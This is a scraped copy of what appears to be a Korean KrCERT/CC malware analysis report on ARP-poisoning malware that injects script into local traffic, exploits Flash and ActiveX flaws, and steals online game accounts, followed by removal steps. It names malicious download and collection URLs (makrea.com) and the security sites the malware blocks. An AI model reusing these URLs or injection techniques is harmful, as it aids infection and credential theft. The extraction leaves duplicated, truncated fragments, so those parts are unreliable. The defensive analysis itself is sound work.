< F69736F6E696E6720BEC7BCBAC4DAB5E520B0A8BFB020BBE7B0EDBAD0BCAE20BAB8B0EDBCAD2E687770>

Size: px

Start display at page:

Download "< F69736F6E696E6720BEC7BCBAC4DAB5E520B0A8BFB020BBE7B0EDBAD0BCAE20BAB8B0EDBCAD2E687770>"

민지 환
5 years ago
Views:

1 인터넷침해사고대응지원센터 (KISC) 본보고서는 CONCERT 정회원사만을대상으로 KISA KrCERT/CC 가제공하는것으로외부로의유출, 특히웹사이트, 카페, 블로그게시등어떤방식으로든지전재및배포가이뤄질수없습니다.

ARP Poisoning 공격의경우, 악성코드감염외에도 DNS 파밍공격및정보유출등공격응용범위가매우넓으며, 피해가발생할경우, 자신의시스템외에도네트워크내의다른사용자들에게도피해를주게되므로주의를하여야한다.

2 개요최근 ARP Poisoning을이용한악성코드감염피해사고가빈번히발생하고있다. 많이확인되고있는피해유형은, 웹을통하여악성코드를유포시키고, ARP Poisoning 전용도구를이용하여동일네트워크내에있는다른 PC들을추가로감염시키는유형이다. ARP Poisoning 공격시, 최근에공개된 FlashPlayer 취약점을악용하여악성코드를유포하는경우도확인되었다. 또한, ARP Poisoning 공격으로인하여네트워크서비스장애가발생하는경우도다수확인되고있다. ARP Poisoning 공격의경우, 악성코드감염외에도 DNS 파밍공격및정보유출등공격응용범위가매우넓으며, 피해가발생할경우, 자신의시스템외에도네트워크내의다른사용자들에게도피해를주게되므로주의를하여야한다. ARP Poisoning 공격을통한악성코드감염플로우 o 이번에확인된사례는사용자PC가감염된후, ARP Poisoning 전용공격도구가추가로설치및실행되어, 해당도구에의하여로컬네트워크 (Subnetwork) 내의타취약 PC들이추가로감염피해를입는유형이었다. <ARP Poisoning 및악성코드감염과정 > Step1) 이동식디스크및기타경로를통하여악성코드에감염 Step2) 악성코드에의하여 ARP Poisoning 공격도구가추가로설치. ARP Poisoning 을위한조작패킷발송

3 Step3) 트래픽가로채기를통하여 HTTP 트래픽에악성 HTML 코드삽입 Step4) 같은로컬네트워크의일반사용자 PC 에서는삽입된악성 HTML 코드에의하여사용자모르게공격자서버로접속이발생하게되며악성코드에감염 ARP Poisoning 공격은로컬네트워크 (Subnetwork) 가공격대상범위이지만, 이번에발견된, 악성코드는 USB 이동저장장치및네트워크공유를통한전파기능도구현되어있어, 타네트워크로감염범위를넓힐수있다

GLCHAT( 중국 Ourgame GLWorld) 3) 1) 중국 StormPlayer 취약점 : http://secunia.

4 악성코드유포경로및악용된취약점 o 유포경로및악용취약점 < 악성코드다운로드에악용된취약점정보 > 유포경로를추적및이용된취약점을확인한결과, 아래와같이 MDAC 등다수의취약점이악용되고있는것으로확인되었다. - Flash Player ActiveX, MDAC(MS06-014) - 리얼플레이어, StormPlayer( 중국미디어플레이어 ) 1) DPClient( 중국 DapPlayer) 2), GLCHAT( 중국 Ourgame GLWorld) 3) 1) 중국 StormPlayer 취약점 : 2) 중국 DapPlayer 취약점 : 3) 중국 Ourgame GLWorld 취약점 : -

5 또한, 피해 PC의인터넷접속로그를기반으로악성코드가감염된경로를추적한결과, 최초 ARP Poisoning에의해인젝션된 1.js 페이지를이용자가방문하게되고 1.js에의해서다중취약점이설정된 index.htm 페이지를방문한다. index.htm에는 MS06-014, 리얼플레이어, StormPlayer( 중국미디어플레이어 ) 4) DPClient( 중국 DapPlayer) 5), GLCHAT( 중국 Ourgame GLWorld) 6) 그리고최근유행하고있는 Flash Player ActiveX 취약점을악용하도록설정되어있다. 피해 PC의경우 MS06-014가패치된상태이고기타 ActiveX 가설치되어있지않았으나, Flash Player에대한보안업데이트 7) 가제대로이루어지지않아악성코드감염피해를당하게된것으로추정된다. Flash Player 버전이 이하인것은모두취약점을가지고있다. 공격이성공하게되면 1.exe 악성코드가다운로드되어실행되게되며, 다수의코드가추가로설치되게된다. o 악성코드설치과정 1.exe 악성코드가실행된후, 추가적으로다운로드및생성되는파일명과생성순서를정리하면다음과같다. 4) 중국 StormPlayer 취약점 : 5) 중국 DapPlayer 취약점 : 6) 중국 Ourgame GLWorld 취약점 : 7) KrCERT/CC 보안공지 : Adobe Flash Player 다중취약점보안업데이트권고 (2008/4/11) - 4 -

o 설치후의주요피해증상 1차악성코드 (csrss.exe) 에감염되게되면, 해당감염코드에의하여추가로게임계정을유출을위한악성코드와대규모감염을위한 ARP Poisoning 도구가설치되게된다. 따라서, 감염사용자PC에서는던젼앤파이터등의온라인게임계정정보유출피해가발생할수있다.

6 o 설치후의주요피해증상 1차악성코드 (csrss.exe) 에감염되게되면, 해당감염코드에의하여추가로게임계정을유출을위한악성코드와대규모감염을위한 ARP Poisoning 도구가설치되게된다. 따라서, 감염사용자PC에서는던젼앤파이터등의온라인게임계정정보유출피해가발생할수있다. 또한 ARP Poisoning 공격으로인하여, 로컬네트워크에서네트워크서비스장애가발생할수있다 2차다운로드코드중 4.exe ~ 10.exe 는테스트시간대에실제다운로드는되지않는것으로확인되었다. 공격자가의도할경우는게임계정유출악성코드외에도악의적인행위를하는추가코드를 4.exe ~ 10.exe 파일형태로유포하는것이가능하였을것으로보인다

7 o 악성코드별상세분석 1.exe가실행되면, 다수의파일이추가로생성되는데, 주요악성코드에대한분석내용은다음과같다. csrss.exe 악성코드 - 6 -

- ARP 공격전용도구설치및실행 arp 공격수행을위하여, wincap library(wincap.exe) 파일과 arp 전용공격도구 (arps.com 또는 arps.exe) 를설치하고실행한다. 실행시 <script src=http://makrea.com/img/btn/1.

8 - ARP 공격전용도구설치및실행 arp 공격수행을위하여, wincap library(wincap.exe) 파일과 arp 전용공격도구 (arps.com 또는 arps.exe) 를설치하고실행한다. 실행시 <script src= 를인자값으로주어로컬네트워크통신트랙픽에악성 URL을인젝션한다 <arps.exe 실행시전달하는인자값코드 >. - 이동저장매체및네트워크공유폴더암호취약점을통하여자기전파 - 자기보호기능아래와같은자기보호기능이구현되어있다.. Fwmon, 방화벽등보안프로그램을종료, 분석도구실행방해. %SYSTEM%/drivers/etc/hosts 파일변조를통하여, 특정보안사이트접속을방해 < 접속방해사이트리스트 > home.ahnlab.com rising.com.cn, dl.jiangmin.com, jiangmin.com shadu.duba.net, kaspersky.com.cn, virustotal.com bbs.sucop.com, tool.ikaka.com 360.qihoo.com, qihoo.com, 9u9u9.cn - 아래의 URL에접속하여, 악성코드를추가로설치 ~ 10.exe 또한, makrea.com/img/btn/tj/ct.asp 에 MAC주소와버젼정보를전송 wsock32.dll 악성코드 - 7 -

. 특정인터넷사이트로부터악성코드를추가로다운로드하여설치. 접속하는 URL 은 http://makrea.com/wm/mm.exe 이며, 현재다운로드되지는않는다.

exe를통하여로컬네트워크에존재하는서버또는 PC를대상으로아래와같은공격이가능하다 데이터유출해커는로컬네트워크내에암호화되지않은상태로전송되는데이터들을캡쳐할수있음 <Arp Poisoning을통하여 FTP 접속 ID, Pass 를유출하는예

9 . 특정인터넷사이트로부터악성코드를추가로다운로드하여설치. 접속하는 URL 은 이며, 현재다운로드되지는않는다. ( http 404 메시지 출력 ) 다운로드사이트 : arps.com (arps.exe) 악성코드 - ARP Poisoning 을위한전용도구. 공격자는 arp.exe를통하여로컬네트워크에존재하는서버또는 PC를대상으로아래와같은공격이가능하다 데이터유출해커는로컬네트워크내에암호화되지않은상태로전송되는데이터들을캡쳐할수있음 <Arp Poisoning을통하여 FTP 접속 ID, Pass 를유출하는예 > 악성코드유포해커는트래픽 Payload 변조및악성 html 코드삽입을통하여, 악성코드유포목적으로활용할수있음 < 악성 html코드삽입예 > DNS 파밍공격 DNS 응답트래픽변조를통하여 DNS 파밍에악용할수있음. 통신속도제한해커는사용자통신속도를제한할수있음 2.exe, 3.exe(=windf.EXE) 악성코드 - 8 -

10 . 온라인게임계정정보유출 메이플스토리, 던젼앤파이터등온라인게임계정을유출한다 < 악성코드에코딩되어있는게임계정정보관련문자열예 > 계정정보는아래의사이트로유출된다. 정보유출예 < 사이트접속및계정정보입력예 > < 입력된사용자계정정보유출예 > 기타 - 9 -

. wincap.exe: ARP Poisoning 공격도구인 arps.exe 실행을위해필요한 dll 파일을설치한다. ARP Poisoning을통한악성코드감염공격의위험성 o ARP Poisoning을통한악성코드감염공격유형은서버팜지역에서공격하는경우와 Client 사용자지역에서공격하는경우로나뉠수있다. 각각의경우에대한공격특성및위험성을살펴보면다음과같다.

11 . wincap.exe: ARP Poisoning 공격도구인 arps.exe 실행을위해필요한 dll 파일을설치한다. ARP Poisoning을통한악성코드감염공격의위험성 o ARP Poisoning을통한악성코드감염공격유형은서버팜지역에서공격하는경우와 Client 사용자지역에서공격하는경우로나뉠수있다. 각각의경우에대한공격특성및위험성을살펴보면다음과같다. 서버팜지역에서악용되는경우는, 공격환경구성을위하여서버팜내의취약서버찾아해킹해야하는과정이필요하다. 그러나일단공격자가취약서버를찾아공격에성공하게되면, 해당서버팜에서운영되는모든서버에접속하는모든이용자들이공격대상이될수있어위험성이높다. < 서버팜내에서 ARP Poisoning 공격 > 클라이언트지역의 ARP Poisoning 의경우, 피해범위가해당PC가존재하는로컬네트워크로한정되나, 비교적보안방어조치가허술한한대의클라이언트사용자PC를해킹하는것으로도가능해지므로발생빈도가높다. 클라이언트지역에서, ARP Poisoning 공격으로인하여네트워크장애가발생하는사례도많이확인되고있다. <Client 지역에서의 ARP Poisoning 공격 >

$윈도우에서 MAC 주소및 ARP 캐시테이블확인방법은다음과같다. 1 윈도우의시작버튼클릭 2 실행창을열고 cmd.exe를실행 3 명령프롬프트에서 "ipconfig /all", "arp -a" 명령입력 o 악성코드설치과정에서생긴다음의특징적인파일들이있을경우감염을확인가능하다. - C:\Windows\Tasks\ 폴더에 csrss.$

12 감염확인방법 o 감염과정에서다수의파일을다운로드및설치하므로컴퓨터의동작이순간적으로느려짐. 특히이후에네트워크응답이지속적으로늦어지거나네트워크장애가발생하면감염을의심할수있다. o 동일한로컬네트워크내다른 PC들의 ARP 캐시테이블에감염의심컴퓨터의실제 MAC 주소가아닌게이트웨이의 MAC 주소엔트리가있을경우, ARP Poisoning 공격악성코드에감염되었을가능성이크다. 윈도우에서 MAC 주소및 ARP 캐시테이블확인방법은다음과같다. 1 윈도우의시작버튼클릭 2 실행창을열고 cmd.exe를실행 3 명령프롬프트에서 "ipconfig /all", "arp -a" 명령입력 o 악성코드설치과정에서생긴다음의특징적인파일들이있을경우감염을확인가능하다. - C:\Windows\Tasks\ 폴더에 csrss.exe 파일등 - 다수의폴더에 wsock32.dll이숨김파일로존재할경우 - C:\WINDOWS\system32\drivers\etc\hosts 파일이변조된경우 - C:\Program Files\ 에글자를알아볼수없는폴더 치료방법

$1 안전모드부팅후, C:\Windows\Tasks\ 에사용자가만든작업파일을제외한모든파일을삭제 2 C:\$

13 참고사항 : 이번에확인된악성코드는자동화제작도구를통하여, 제작된것으로보인다. 제작시의도구옵션값에따라, 타기능들이추가될수있으므로, 다른옵션조건으로제작된샘플의경우치료방법이다를수있다. 1 안전모드부팅후, C:\Windows\Tasks\ 에사용자가만든작업파일을제외한모든파일을삭제 2 C:\ 하위의모든폴더에서 wsock32.dll 파일을검색하여시스템파일 (30KB 이상 ) 을제외한악성파일 (16KB) 을모두삭제

$(C:\WINDOWS\system32\wsock32.$ dll 등 ) 을삭제하면시스템오류가발생할수있으므로주의요망 3

14 윈도우시스템파일 (C:\WINDOWS\system32\wsock32.dll 등 ) 을삭제하면시스템오류가발생할수있으므로주의요망 3 메모장으로 C:\WINDOWS\system32\drivers\etc\hosts 를열어서모든내용을삭제후저장

$4 C:\WINDOWS\system32\drivers\windf.$

15 4 C:\WINDOWS\system32\drivers\windf.* 파일을삭제 5 %USERPROFILE%\Local Settings\Temp\ 혹은 %TEMP% 폴더에서 *.pif 파일을삭제

$6 C:\Windows\system32\ 에서 wincap.exe, arps.$ $dll을삭제 7 C:\Windows\ 에서 MicroSoft.$

16 6 C:\Windows\system32\ 에서 wincap.exe, arps.com을삭제하고 WinPcap 을설치한적이없다면추가로 Packet.dll, WanPacket.dll, wpcap.dll을삭제 7 C:\Windows\ 에서 MicroSoft.pif 과 MicroSoft.vbs 파일을찾아서삭제

$8 C:\Program Files\$ 레지스트리편집기 (regedit.

17 8 C:\Program Files\ 에서글자가깨져서보이는폴더를삭제 9 레지스트리편집기 (regedit.exe) 에서 03AA4538A6A8로검색하여상위키모두삭제

$10 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run에서 windf.$

18 10 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run에서 windf.exe 항목을삭제 11 HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ 에서 hackshen.vbs로검색하여해당키삭제

$12 시스템재부팅후 C:\Windows\system32\ 에서 03AA4538A6A8.$ exe 삭제 13 아래 Adobe 웹사이트를통해서현재설치된 Flash Player

19 12 시스템재부팅후 C:\Windows\system32\ 에서 03AA4538A6A8.dll 과 03AA4538A6A8.exe 삭제 13 아래 Adobe 웹사이트를통해서현재설치된 Flash Player 버전을확인한다. URI:

20 14 Flash Player 버전이 이하인것은모두취약점을가지고있기때문에사용하는웹브라우저를열고아래 URL 를입력하여업데이트를한다. < 참고 > [KrCERT/CC ARP Spoofing 공격분석및대책 ] /unimdocsdownload.do?filename1=tr _arp_spoofing.p df&docno=tr &dockind=2 [KrCERT/CC ARP Spoofing 기법을이용한웹페이지악성코드삽입사례 ] /unimdocsdownload.do?filename1=in pdf&docno=in &docKind=3-19 -

*2008년1월호진짜

*2008년1월호진짜 3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가